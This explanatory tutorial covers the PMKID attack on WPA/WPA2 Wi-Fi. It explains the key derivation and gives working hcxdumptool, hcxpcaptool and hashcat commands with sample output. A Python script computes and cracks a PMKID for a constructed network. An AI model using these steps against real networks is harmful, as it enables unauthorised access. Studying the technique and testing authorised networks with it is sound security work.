This method was discovered during research on attacking the recently released WPA3 security standard, which is much harder to crack because it uses the modern key establishment protocol Simultaneous Authentication of Equals (SAE). WPA3 is the successor to WPA2, released by the Wi-Fi Alliance to provide next-generation Wi-Fi security with new capabilities for both personal and enterprise networks.

The researcher found that this attack can recover the WPA/WPA2 pre-shared key without capturing a complete EAPOL 4-way handshake. According to Jens Steube, the developer of the Hashcat password cracking tool, the attack is carried out on the RSN IE of a single EAPOL frame. Steube expects it to work against 802.11i/p/q/r networks with roaming functions enabled, but it is not yet clear for how many vendors and router models the technique actually works.

How this WPA/WPA2 WiFi Password Attack Works

The Robust Security Network Information Element (RSN IE) is an optional field in 802.11 management frames, and it is also carried in the first EAPOL frame (message 1 of the 4-way handshake) that the access point sends. When a station attempts to authenticate to the router, the Pairwise Master Key Identifier (PMKID) can be captured from that RSN IE. In Steube's words: "We can see here that the PMKID is captured using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of the fixed string label 'PMK Name', the MAC address of the access point and the MAC address of the station."

In other words, PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), and for WPA/WPA2-PSK the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). Because the AP hands out the PMKID in message 1, before any client has finished authenticating, an attacker can capture it simply by starting an association and then crack the passphrase offline, exactly as with a captured handshake. The cracking work itself is unchanged: every candidate passphrase still costs a full PBKDF2 computation, so a long random passphrase remains the defence.

To use this new attack, the following tools are required:
- hcxdumptool v4.2.0 or higher
- hcxtools v4.2.0 or higher
- Hashcat v4.2.0 or higher

Step 1

First run hcxdumptool to retrieve the PMKID from the AP and dump it to a pcapng file:

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

The output looks like this:

start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Step 2

Next run hcxpcaptool to convert the captured data from pcapng format into a hash format accepted by hashcat:

$ ./hcxpcaptool -z test.16800 test.pcapng

Each line of the resulting file has four '*'-separated columns: PMKID, MAC AP, MAC Station and ESSID (the ESSID is hex encoded):

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

It is also recommended to use the following options:

-E retrieve possible passwords from WiFi traffic (this list will also include ESSIDs)
-I retrieve identities from WiFi traffic
-U retrieve usernames from WiFi traffic

$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Step 3

Finally, run hashcat to crack it. Select the PMKID hash mode 16800; beyond that the hash is handled like any other hash type, here with a brute-force mask:

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Hashcat reports the cracked hash under the type name WPA-PMKID-PBKDF2.

To obtain the PMKID, the attacker only has to attempt to authenticate to the wireless network; no regular client has to be connected, because the PMKID is sent by the AP before authentication completes. This makes getting hold of the hash that depends on the pre-shared key much easier than waiting for a full 4-way handshake, and the hash can be cracked later offline. The cracking step itself is no cheaper than before, though: the effort still depends entirely on the strength of the password.
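To make the PMKID formula from the "How it works" section and the three-step procedure above concrete, here is an added worked example in Python. It is not code from the original article nor from the hashcat or hcxtools projects. It derives the PMK with PBKDF2-HMAC-SHA1, computes the PMKID exactly as Steube describes, writes it in hashcat's 16800 format (PMKID*MAC_AP*MAC_STA*ESSID, hex encoded) and then runs a small wordlist attack over such a line, which is the same per-candidate work hashcat -m 16800 does. The SSID, MAC addresses and passphrase are constructed for the example; the real capture above is not used because its passphrase is not given on the page.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

PMK_LABEL = b"PMK Name"      # fixed label from IEEE 802.11i
PBKDF2_ITERATIONS = 4096     # WPA/WPA2-PSK passphrase-to-PMK mapping
PMK_LEN = 32
PMKID_LEN = 16               # HMAC-SHA1-128: the SHA-1 tag truncated to 128 bits


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), as in WPA/WPA2-PSK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid,
                               PBKDF2_ITERATIONS, PMK_LEN)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA)."""
    tag = hmac.new(pmk, PMK_LABEL + mac_ap + mac_sta, hashlib.sha1).digest()
    return tag[:PMKID_LEN]


def to_16800_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: bytes) -> str:
    """hashcat -m 16800 input: PMKID*MAC_AP*MAC_STA*ESSID, every field hex encoded."""
    return "*".join(field.hex() for field in (pmkid, mac_ap, mac_sta, ssid))


def parse_16800_line(line: str) -> Tuple[bytes, bytes, bytes, bytes]:
    """Inverse of to_16800_line, with the basic length checks a cracker should apply."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError("expected PMKID*MAC_AP*MAC_STA*ESSID")
    pmkid, mac_ap, mac_sta, ssid = (bytes.fromhex(f) for f in fields)
    if len(pmkid) != PMKID_LEN or len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("bad field length")
    if not 1 <= len(ssid) <= 32:
        raise ValueError("ESSID must be 1..32 bytes")
    return pmkid, mac_ap, mac_sta, ssid


def crack_16800(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Wordlist attack: one PBKDF2 run plus one HMAC per candidate, like hashcat."""
    pmkid, mac_ap, mac_sta, ssid = parse_16800_line(line)
    for passphrase in candidates:
        if not 8 <= len(passphrase) <= 63:   # WPA-PSK passphrase length limits
            continue
        guess = compute_pmkid(derive_pmk(passphrase, ssid), mac_ap, mac_sta)
        if hmac.compare_digest(guess, pmkid):
            return passphrase
    return None


# Constructed sample network (not the capture from the article). The AP side
# knows the passphrase and would send this PMKID in message 1 of the handshake.
SAMPLE_SSID = b"ExampleNet"
SAMPLE_MAC_AP = bytes.fromhex("02ab1c2d3e4f")
SAMPLE_MAC_STA = bytes.fromhex("02aa0b1c2d3e")
SAMPLE_PASSPHRASE = "correct-horse"


def build_sample_line() -> str:
    """The 16800 line hcxpcaptool -z would produce for the constructed network."""
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    pmkid = compute_pmkid(pmk, SAMPLE_MAC_AP, SAMPLE_MAC_STA)
    return to_16800_line(pmkid, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_SSID)


if __name__ == "__main__":
    line = build_sample_line()
    print("16800 line:", line)
    print("cracked:", crack_16800(line, ["password", "letmein1", "correct-horse"]))
```

Running it prints the constructed 16800 line and recovers "correct-horse" from the small wordlist. Two details worth noticing: the PMKID is bound to both MAC addresses, so a line from one client/AP pair cannot be reused to check guesses against another, and the per-candidate cost is one full PBKDF2 derivation, which is why the PMKID technique changes how the material is captured but not how hard the passphrase is to crack.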